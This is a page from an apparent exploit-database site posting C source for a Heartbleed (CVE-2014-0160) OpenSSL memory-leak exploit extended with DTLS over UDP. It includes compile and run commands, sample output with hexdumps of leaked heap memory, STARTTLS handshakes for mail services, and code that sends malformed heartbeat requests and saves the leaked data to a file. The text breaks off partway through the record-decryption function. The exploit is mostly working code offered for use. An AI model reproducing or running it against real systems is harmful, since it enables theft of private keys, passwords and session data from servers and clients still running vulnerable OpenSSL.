[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support

Author
Ayman Sagy
Risk
[
Security Risk High
]
0day-ID
0day-ID-22172
Category
remote exploits
Date add
24-04-2014
CVE
CVE-2014-0160
Platform
multiple
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned within encrypted SSL packets and is then decrypted
* and wrote to a file to annoy IDS/forensics. The exploit can
* set heartbeat payload length arbitrarily or use two preset
* values for NULL and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
* is user supplied and returned to the user as part of DTLS/TLS
* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
* 1.0.1f are known affected. You must run this against a target
* which is linked to a vulnerable OpenSSL library using DTLS/TLS.
* This exploit leaks upto 65532 bytes of remote heap each request
* and can be run in a loop until the connected peer ends connection.
* The data leaked contains 16 bytes of random padding at the end.
* The exploit can be used against a connecting client or server,
* it can also send pre_cmd's to plain-text services to establish
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
* will often forcefully close the connection during large leak
* requests so try to lower your payload request size.
*
* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
*
* E.g.
* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ connecting to 192.168.11.23 443/tcp
* [ connected to 192.168.11.23 443/tcp
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ heartbleed leaked length=65535
* [ final record type=24, length=16384
* [ wrote 16381 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=42
* [ decrypting SSL packet
* [ final record type=24, length=18
* [ wrote 18 bytes of heap to file 'out'
* [ done.
* $ ls -al out
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
* $ hexdump -C out
* - snip - snip 
*
* Use following example command to generate certificates for clients.
*
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
* -keyout server.key -out server.crt
*
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
*
* todo: add udp/dtls support.
*
* - Hacker Fantastic
*   http://www.mdsec.co.uk
*
*/
 
/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support
*
* use -u switch, tested against s_server/s_client version 1.0.1d
*
* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1
* ...
* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=1392
* [ decrypting SSL packet
* [ heartbleed leaked length=1336
* [ final record type=24, length=1355
* [ wrote 1352 bytes of heap to file 'eshta'
*
*
* # hexdump -C eshta
* 00000000  00 00 00 00 06 30 f1 95  08 00 00 00 00 00 00 00  |.....0..........|
* 00000010  8c 43 64 ab e3 89 6b fd  e3 d3 74 a1 a1 31 8c 35  |.Cd...k...t..1.5|
* 00000020  09 6d b9 e7 08 08 08 08  08 08 08 08 08 a1 65 9f  |.m............e.|
* 00000030  ca 13 80 7c a5 88 b0 c9  d5 f6 7b 14 fe ff 00 00  |...|......{.....|
* 00000040  00 00 00 00 00 03 00 01  01 16 fe ff 00 01 00 00  |................|
* 00000050  00 00 00 00 00 40 b5 fd  a5 10 da c4 fd fb c7 d2  |.....@..........|
* 00000060  9f 0c 56 4b a9 9c 14 00  00 0c 00 03 00 00 00 00  |..VK............|
* 00000070  00 0c 69 ec c4 d5 f3 38  ae e5 2e 3a 1a 32 f9 30  |..i....8...:.2.0|
* 00000080  7f 61 4c 8c d7 34 f3 02  08 3f 68 01 a9 a7 81 55  |.aL..4...?h....U|
* 00000090  01 c9 03 03 03 03 00 00  0e 31 39 32 2e 31 36 38  |.........192.168|
* 000000a0  2e 37 35 2e 32 33 35 00  23 00 00 00 0f 00 01 01  |.75.235.#.......|
* 000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
* 00000530  00 00 00 00 00 00 00 00  a5 e2 f5 67 d6 23 85 49  |...........g.#.I|
* 00000540  b3 cc ed c4 d2 74 c8 97  c1 b4 cc                 |.....t.....|
* 0000054b
*
*
* # openssl s_client -connect localhost:990 -dtls1
* ...
* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ SSL connection using AES256-SHA
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=1392
* [ decrypting SSL packet
* [ heartbleed leaked length=1336
* [ final record type=24, length=1355
* [ wrote 1352 bytes of heap to file 'eshta'
*
*
* # hexdump -C eshta
* 00000000  00 00 24 4e b7 00 00 00  00 00 00 00 00 18 00 00  |..$N............|
* 00000010  cf d0 5f df c3 64 5f 58  79 17 f8 f7 22 9b 28 6e  |.._..d_Xy...".(n|
* 00000020  c0 e7 d6 a3 08 08 08 08  08 08 08 08 08 9b c3 38  |...............8|
* 00000030  2b 32 5f dd 3a d5 0f 83  51 02 2f 70 33 8f cf 82  |+2_.:...Q./p3...|
* 00000040  21 5b cc 25 80 26 f3 29  c8 90 91 ec 5c 83 68 ee  |![.%.&.)....\.h.|
* 00000050  6b 11 0d ad f1 f4 da 9e  13 59 8f 2a 74 f6 d4 35  |k........Y.*t..5|
* 00000060  9e 17 12 7c 2b 6f 9e a8  1e b4 7a 3c a5 ec 18 e0  |...|+o....z<....|
* 00000070  44 b2 51 e4 69 8c 47 29  39 fb 9e b0 dd 5b 05 4d  |D.Q.i.G)9....[.M|
* 00000080  db 11 06 7b 1d 08 58 60  ac 34 3f 2d d1 14 c1 b7  |...{..X`.4?-....|
* 00000090  d5 08 59 73 16 28 f8 75  23 f7 85 27 48 be 1f 14  |..Ys.(.u#..'H...|
* 000000a0  fe ff 00 00 00 00 00 00  00 04 00 01 01 16 fe ff  |................|
* 000000b0  00 01 00 00 00 00 00 00  00 40 62 1c 02 19 45 5f  |.........@b...E_|
* 000000c0  2c a6 89 95 d2 bf 16 c4  8b b7 14 00 00 0c 00 04  |,...............|
* 000000d0  00 00 00 00 00 0c e9 fb  75 02 61 90 be 4d f7 82  |........u.a..M..|
* 000000e0  06 d6 fd 6d 53 a1 d5 44  e0 5a 0d 6a 6a 94 ef e8  |...mS..D.Z.jj...|
* 000000f0  4c 01 4b cb 86 73 03 03  03 03 2d 53 74 61 74 65  |L.K..s....-State|
* 00000100  31 21 30 1f 06 03 55 04  0a 0c 18 49 6e 74 65 72  |1!0...U....Inter|
* 00000110  6e 65 74 20 57 69 64 67  69 74 73 20 50 74 79 20  |net Widgits Pty |
* 00000120  4c 74 64 30 82 01 22 30  0d 06 09 2a 86 48 86 f7  |Ltd0.."0...*.H..|
* 00000130  0d 01 01 01 05 00 03 82  01 0f 00 30 82 01 0a 02  |...........0....|
* 00000140  82 01 01 00 c0 85 26 4a  9d cd f8 5e 46 74 fa 89  |......&J...^Ft..|
* 00000150  e3 7d 58 76 23 ba ba dc  b1 35 98 35 a5 ba 53 a1  |.}Xv#....5.5..S.|
* 00000160  5b 37 28 fe f7 d0 02 fc  fd c9 e3 b1 ee e6 fe 79  |[7(............y|
* 00000170  86 f8 81 1a 29 29 a9 81  95 1c c9 5c 81 a2 e8 0c  |....)).....\....|
* 00000180  35 b7 cb 67 8a ec 2a d1  73 e6 70 78 53 c8 50 91  |5..g..*.s.pxS.P.|
* 00000190  49 07 db e1 a4 08 7b fb  07 54 48 85 45 c2 38 71  |I.....{..TH.E.8q|
* 000001a0  6a 8a f2 4d a7 ba 1a 86  36 a2 ae bb a1 e1 7c 2c  |j..M....6.....|,|
* 000001b0  12 04 ce e5 d1 75 24 94  1c 31 2c 46 b7 76 30 3a  |.....u$..1,F.v0:|
* 000001c0  04 79 2f b3 65 74 fb ae  c7 10 a5 da a8 2d b6 fd  |.y/.et.......-..|
* 000001d0  cf f9 11 fe 38 cd 25 7e  13 75 14 1d 58 92 bb 3f  |....8.%~.u..X..?|
* 000001e0  8f 75 d5 52 f7 27 66 ca  5d 55 4d 0a b5 71 a2 16  |.u.R.'f.]UM..q..|
* 000001f0  3e 01 af 97 93 eb 5c 3f  e0 fa c8 61 2c a1 87 8f  |>.....\?...a,...|
* 00000200  60 d4 df 5d 9d cd 0f 34  a9 66 6c 93 d8 5f 4a 2b  |`..]...4.fl.._J+|
* 00000210  fd 67 3a 2f 88 90 b4 e9  f5 d6 ee bb 7d 8b 1c e5  |.g:/........}...|
* 00000220  f2 cc 4f b2 c0 dc e8 1b  4c 6e 51 c9 47 8b 6c 82  |..O.....LnQ.G.l.|
* 00000230  f9 4b ae 01 a8 f9 6c 6d  d5 1a d5 cf 63 f4 7f e0  |.K....lm....c...|
* 00000240  96 54 3f 7d 02 03 01 00  01 a3 50 30 4e 30 1d 06  |.T?}......P0N0..|
* 00000250  03 55 1d 0e 04 16 04 14  af 97 4e 87 62 8a 77 b8  |.U........N.b.w.|
* 00000260  b4 0b 24 20 35 b1 66 09  55 3f 74 1d 30 1f 06 03  |..$ 5.f.U?t.0...|
* 00000270  55 1d 23 04 18 30 16 80  14 af 97 4e 87 62 8a 77  |U.#..0.....N.b.w|
* 00000280  b8 b4 0b 24 20 35 b1 66  09 55 3f 74 1d 30 0c 06  |...$ 5.f.U?t.0..|
* 00000290  03 55 1d 13 04 05 30 03  01 01 ff 30 0d 06 09 2a  |.U....0....0...*|
* 000002a0  86 48 86 f7 0d 01 01 05  05 00 03 82 01 01 00 b0  |.H..............|
* 000002b0  8e 40 58 2d 86 32 95 11  a7 a1 64 1d fc 08 8d 87  |.@X-.2....d.....|
* 000002c0  18 d3 5d c6 a0 bb 84 4a  50 f5 27 1c 15 4b 02 0c  |..]....JP.'..K..|
* 000002d0  49 1f 2d 0a 52 d3 98 6b  71 3d b9 0f 36 24 d3 77  |I.-.R..kq=..6$.w|
* 000002e0  e0 d0 a5 50 e5 ea 2d 67  11 69 4d 45 52 97 4d 58  |...P..-g.iMER.MX|
* 000002f0  de 22 06 02 6d 21 80 2f  0d 1c d5 d5 80 5c 8f 44  |."..m!./.....\.D|
* 00000300  1e b6 f3 41 4c dc d3 40  8d 54 ac b0 ca 8f 19 6a  |...AL..@.T.....j|
* 00000310  4d f2 fb ad 68 5a 99 19  ca ae b2 f5 54 70 29 96  |M...hZ......Tp).|
* 00000320  84 7e ba a9 6b 42 e6 68  32 dc 65 87 b1 b7 17 22  |.~..kB.h2.e...."|
* 00000330  e3 cc 62 97 e4 fa 64 0b  1e 70 bf e5 a2 40 e4 49  |..b...d..p...@.I|
* 00000340  24 f9 05 3f 2e fe 7c 38  56 39 4d bd 51 63 0d 79  |$..?..|8V9M.Qc.y|
* 00000350  85 c0 4b 1a 46 64 e0 fe  a8 87 bf c7 4d 21 cb 79  |..K.Fd......M!.y|
* 00000360  37 e7 a6 e3 6c 3b ed 35  17 73 7a 71 c6 72 2f bb  |7...l;.5.szq.r/.|
* 00000370  58 dc ef e9 1e a3 89 5e  70 cd 95 10 87 c1 8a 7e  |X......^p......~|
* 00000380  e7 51 c2 22 67 66 ee 22  f9 a5 2e 31 f2 ad fc 3b  |.Q."gf."...1...;|
* 00000390  98 c8 30 63 ef 74 b5 4e  c4 bd c7 a2 46 0a b8 bf  |..0c.t.N....F...|
* 000003a0  df a8 54 0e 4f 37 d0 a5  27 a3 f3 a7 28 38 3f 16  |..T.O7..'...(8?.|
* 000003b0  fe ff 00 00 00 00 00 00  00 02 00 0c 0e 00 00 00  |................|
* 000003c0  00 02 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
* 000003d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
* *
* 00000530  00 00 00 00 00 00 00 00  82 8f be ff cf 26 12 9d  |.............&..|
* 00000540  a2 de 0c 44 21 4a 54 be  41 4c df                 |...D!JT.AL.|
* 0000054b
*
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <signal.h>
#include <netdb.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <inttypes.h>
#include <openssl/bio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <openssl/evp.h>
#include <openssl/tls1.h>
#include <openssl/rand.h>
#include <openssl/buffer.h>
 
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
        (((unsigned int)(c[1]))    )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
         c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
 
int first = 0;
int leakbytes = 0;
int repeat = 1;
int badpackets = 0;
 
typedef struct {
    int socket;
    SSL *sslHandle;
    SSL_CTX *sslContext;
} connection;
 
typedef struct {
  unsigned char type;
  short version;
  unsigned int length;
  unsigned char hbtype;
  unsigned int payload_length;
  void* payload;
} heartbeat;
 
void ssl_init();
void usage();
int tcp_connect(char*,int);
int tcp_bind(char*, int);
connection* tls_connect(int);
connection* tls_bind(int);
int pre_cmd(int,int,int);
void* heartbleed(connection* ,unsigned int);
void* sneakyleaky(connection* ,char*, int);
 
static DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);
static int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);
static int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);
static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);
 
int tcp_connect(char* server,int port){
    int sd,ret;
    struct hostent *host;
        struct sockaddr_in sa;
        host = gethostbyname(server);
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd==-1){
        printf("[!] cannot create socket\n");
        exit(0);
    }
    sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
        bzero(&(sa.sin_zero),8);
    printf("[ connecting to %s %d/tcp\n",server,port);
        ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
    if(ret==0){
        printf("[ connected to %s %d/tcp\n",server,port);
    }
    else{
        printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
        exit(0);
    }
    return sd;
}
 
int tcp_bind(char* server, int port){
    int sd, ret, val=1;
    struct sockaddr_in sin;
    struct hostent *host;
    host = gethostbyname(server);
    sd=socket(AF_INET,SOCK_STREAM,0);
    if(sd==-1){
            printf("[!] cannot create socket\n");
        exit(0);
    }
    memset(&sin,0,sizeof(sin));
    sin.sin_addr=*((struct in_addr *) host->h_addr);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
        setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
    ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
    if(ret==-1){
        printf("[!] cannot bind socket\n");
        exit(0);
    }
    listen(sd,5);
    return(sd);
}
 
connection* dtls_server(int sd, char* server,int port){
    int bytes;
        connection *c;
        char* buf;
    buf = malloc(4096);
    int ret;
    struct hostent *host;
        struct sockaddr_in sa;
    unsigned long addr;
        if ((host = gethostbyname(server)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd==-1){
        printf("[!] cannot create socket\n");
        exit(0);
    }
    sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
    if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
        perror("bind()");
        exit(1);
    }
 
    BIO *bio;
        if(c==NULL){
        printf("[ error in malloc()\n");
        exit(0);
    }
        if(buf==NULL){
                printf("[ error in malloc()\n");
                exit(0);
        }
    memset(buf,0,4096);
    c = malloc(sizeof(connection));
    if(c==NULL){
                printf("[ error in malloc()\n");
                exit(0);
        }
    c->socket = sd;
        c->sslHandle = NULL;
        c->sslContext = NULL;
        c->sslContext = SSL_CTX_new(DTLSv1_server_method());
    SSL_CTX_set_read_ahead (c->sslContext, 1);
        if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
    SSL_CTX_SRP_CTX_init(c->sslContext);
    SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
    SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);      
    if(!SSL_CTX_check_private_key(c->sslContext)){
        printf("[!] FATAL: private key does not match the certificate public key\n");
        exit(0);
    }
    c->sslHandle = SSL_new(c->sslContext);
        if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
        if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
        bio = BIO_new_dgram(sd, BIO_NOCLOSE);
 
        SSL_set_bio(c->sslHandle, bio, bio);
        SSL_set_accept_state (c->sslHandle);
 
        int rc = SSL_accept(c->sslHandle);
    printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
//  bytes = SSL_read(c->sslHandle, buf, 4095);
//  printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
    if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
        }
        return c;
}
 
void ssl_init(){
        SSL_load_error_strings();
        SSL_library_init();
        OpenSSL_add_all_digests();
        OpenSSL_add_all_algorithms();
        OpenSSL_add_all_ciphers();
}
 
connection* tls_connect(int sd){
        connection *c;
    c = malloc(sizeof(connection));
        if(c==NULL){
        printf("[ error in malloc()\n");
        exit(0);
    }
    c->socket = sd;
        c->sslHandle = NULL;
        c->sslContext = NULL;
        c->sslContext = SSL_CTX_new(SSLv23_client_method());
    SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
        if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
        c->sslHandle = SSL_new(c->sslContext);
        if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
        if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
        if(SSL_connect(c->sslHandle)!=1)
                ERR_print_errors_fp(stderr);
        if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
        }
    return c;
}
 
connection* dtls_client(int sd, char* server,int port){
    int ret;
    struct hostent *host;
        struct sockaddr_in sa;
        connection *c;
    memset((char *)&sa,0,sizeof(sa));
    c = malloc(sizeof(connection));
        if ((host = gethostbyname(server)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd==-1){
        printf("[!] cannot create socket\n");
        exit(0);
    }
    sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
    if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
        perror("connect()");
        exit(0);
    }
 
    BIO *bio;
        if(c==NULL){
        printf("[ error in malloc()\n");
        exit(0);
    }
 
        c->sslContext = NULL;
        c->sslContext = SSL_CTX_new(DTLSv1_client_method());
    SSL_CTX_set_read_ahead (c->sslContext, 1);
        if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
        if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
 
    c->socket = sd;
        c->sslHandle = NULL;
        c->sslHandle = SSL_new(c->sslContext);
    SSL_set_tlsext_host_name(c->sslHandle,server);
    bio = BIO_new_dgram(sd, BIO_NOCLOSE);
 
    BIO_ctrl_set_connected(bio, 1, &sa);
    SSL_set_bio(c->sslHandle, bio, bio);
    SSL_set_connect_state (c->sslHandle);
//printf("eshta\n");
        if(SSL_connect(c->sslHandle)!=1)
                ERR_print_errors_fp(stderr);
 
        if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway), %d \n",c->sslHandle->tlsext_heartbeat);
        }
    return c;
}
 
connection* tls_bind(int sd){
    int bytes;
        connection *c;
        char* buf;
    buf = malloc(4096);
        if(buf==NULL){
                printf("[ error in malloc()\n");
                exit(0);
        }
    memset(buf,0,4096);
    c = malloc(sizeof(connection));
    if(c==NULL){
                printf("[ error in malloc()\n");
                exit(0);
        }
    c->socket = sd;
        c->sslHandle = NULL;
        c->sslContext = NULL;
        c->sslContext = SSL_CTX_new(SSLv23_server_method());
        if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
    SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
    SSL_CTX_SRP_CTX_init(c->sslContext);
    SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
    SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);      
    if(!SSL_CTX_check_private_key(c->sslContext)){
        printf("[!] FATAL: private key does not match the certificate public key\n");
        exit(0);
    }
    c->sslHandle = SSL_new(c->sslContext);
        if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
        if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
        int rc = SSL_accept(c->sslHandle);
    printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
    bytes = SSL_read(c->sslHandle, buf, 4095);
    printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
    if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
        }
        return c;
}
 
int pre_cmd(int sd,int precmd,int verbose){
    /* this function can be used to send commands to a plain-text
    service or client before heartbleed exploit attempt. e.g. STARTTLS */
    int rc, go = 0;
    char* buffer;
    char* line1;
    char* line2; 
    switch(precmd){
        case 0:
            line1 = "EHLO test\n";
            line2 = "STARTTLS\n";
            break;
        case 1:
            line1 = "CAPA\n";
            line2 = "STLS\n";
            break;
        case 2:
            line1 = "a001 CAPB\n";
            line2 = "a002 STARTTLS\n";
            break;
        default:
            go = 1;
            break;
    }
    if(go==0){
        buffer = malloc(2049);
            if(buffer==NULL){
                    printf("[ error in malloc()\n");
                    exit(0);
            }
        memset(buffer,0,2049);
        rc = read(sd,buffer,2048);
        printf("[ banner: %s",buffer);
        send(sd,line1,strlen(line1),0);
        memset(buffer,0,2049);
        rc = read(sd,buffer,2048);
        if(verbose==1){
            printf("%s\n",buffer);
        }
        send(sd,line2,strlen(line2),0);
        memset(buffer,0,2049);
        rc = read(sd,buffer,2048);
        if(verbose==1){
            printf("%s\n",buffer);
        }
    }
    return sd;
}
 
void* heartbleed(connection *c,unsigned int type){
    unsigned char *buf, *p;
        int ret;
    buf = OPENSSL_malloc(1 + 2);
    if(buf==NULL){
                printf("[ error in malloc()\n");
                exit(0);
        }
    p = buf;
        *p++ = TLS1_HB_REQUEST;
    switch(type){
        case 0:
            s2n(0x0,p);
            break;
        case 1:
            s2n(0xffff,p);
            break;
        default:
            printf("[ setting heartbeat payload_length to %u\n",type);
            s2n(type,p);
            break;
    }
    printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
        ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
        OPENSSL_free(buf);
    return c;
}
 
void* dtlsheartbleed(connection *c,unsigned int type){
 
    unsigned char *buf, *p;
        int ret;
    buf = OPENSSL_malloc(1 + 2 + 16);
    memset(buf, '\0', sizeof buf);
    if(buf==NULL){
                printf("[ error in malloc()\n");
                exit(0);
        }
    p = buf;
        *p++ = TLS1_HB_REQUEST;
    switch(type){
        case 0:
            s2n(0x0,p);
            break;
        case 1:
//          s2n(0xffff,p);
//          s2n(0x3feb,p);
            s2n(0x0538,p);
            break;
        default:
            printf("[ setting heartbeat payload_length to %u\n",type);
            s2n(type,p);
            break;
    }
    s2n(c->sslHandle->tlsext_hb_seq, p);
    printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
 
          ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);
 
    if (ret >= 0)
        {
        if (c->sslHandle->msg_callback)
            c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,
                buf, 3 + 16,
                c->sslHandle, c->sslHandle->msg_callback_arg);
 
        dtls1_start_timer(c->sslHandle);
        c->sslHandle->tlsext_hb_pending = 1;
        }
 
        OPENSSL_free(buf);
 
    return c;
}
 
void* sneakyleaky(connection *c,char* filename, int verbose){
    char *p;
        int ssl_major,ssl_minor,al;
        int enc_err,n,i;
        SSL3_RECORD *rr;
        SSL_SESSION *sess;
    SSL* s;
        unsigned char md[EVP_MAX_MD_SIZE];
        short version;
        unsigned mac_size, orig_len;
        size_t extra;
        rr= &(c->sslHandle->s3->rrec);
        sess=c->sslHandle->session;
        s = c->sslHandle;
        if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
                extra=SSL3_RT_MAX_EXTRA;
        else
                extra=0;
        if ((s->rstate != SSL_ST_READ_BODY) ||
                (s->packet_length < SSL3_RT_HEADER_LENGTH)) {
                        n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
                        if (n <= 0)
                                goto apple;
                        s->rstate=SSL_ST_READ_BODY;
                        p=s->packet;
                        rr->type= *(p++);
                        ssl_major= *(p++);
                        ssl_minor= *(p++);
                        version=(ssl_major<<8)|ssl_minor;
                        n2s(p,rr->length);
            if(rr->type==24){
                printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
                if(rr->length > 16834){
                    printf("[ error: got a malformed TLS length.\n");
                    exit(0);
                }
            }
            else{
                printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
                s->packet_length=0;
                badpackets++;
                if(badpackets > 3){
                    printf("[ error: too many bad packets recieved\n");
                    exit(0);
                }
                goto apple;
            }
        }
        if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){
                i=rr->length;
                n=ssl3_read_n(s,i,i,1);
                if (n <= 0) goto apple;
        }
    printf("[ decrypting SSL packet\n");
        s->rstate=SSL_ST_READ_HEADER;
        rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
        rr->data=rr->input;
        tls1_enc(s,0);
        if((sess != NULL) &&
            (s->enc_read_ctx != NULL) &&
            (EVP_MD_CTX_md(s->read_hash) != NULL))
                {
                unsigned char *mac = NULL;
                unsigned char mac_tmp[EVP_MAX_MD_SIZE];
                mac_size=EVP_MD_CTX_size(s->read_hash);
                OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
                orig_len = rr->length+((unsigned int)rr->type>>8);
                if(orig_len < mac_size ||
                  (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
                   orig_len < mac_size+1)){
                        al=SSL_AD_DECODE_ERROR;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
                }
                if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
                        mac = mac_tmp;
                        ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
                        rr->length -= mac_size;
                }
                else{
                        rr->length -= mac_size;
                        mac = &rr->data[rr->length];
                }
                i = tls1_mac(s,md,0);
                if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
                        enc_err = -1;
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)
                        enc_err = -1;
                }
        if(enc_err < 0){
                al=SSL_AD_BAD_RECORD_MAC;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
                goto apple;
        }
        if(s->expand != NULL){
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {
                        al=SSL_AD_RECORD_OVERFLOW;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
                        goto apple;
                        }
                if (!ssl3_do_uncompress(s)) {
                        al=SSL_AD_DECOMPRESSION_FAILURE;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
                        goto apple;
                        }
                }
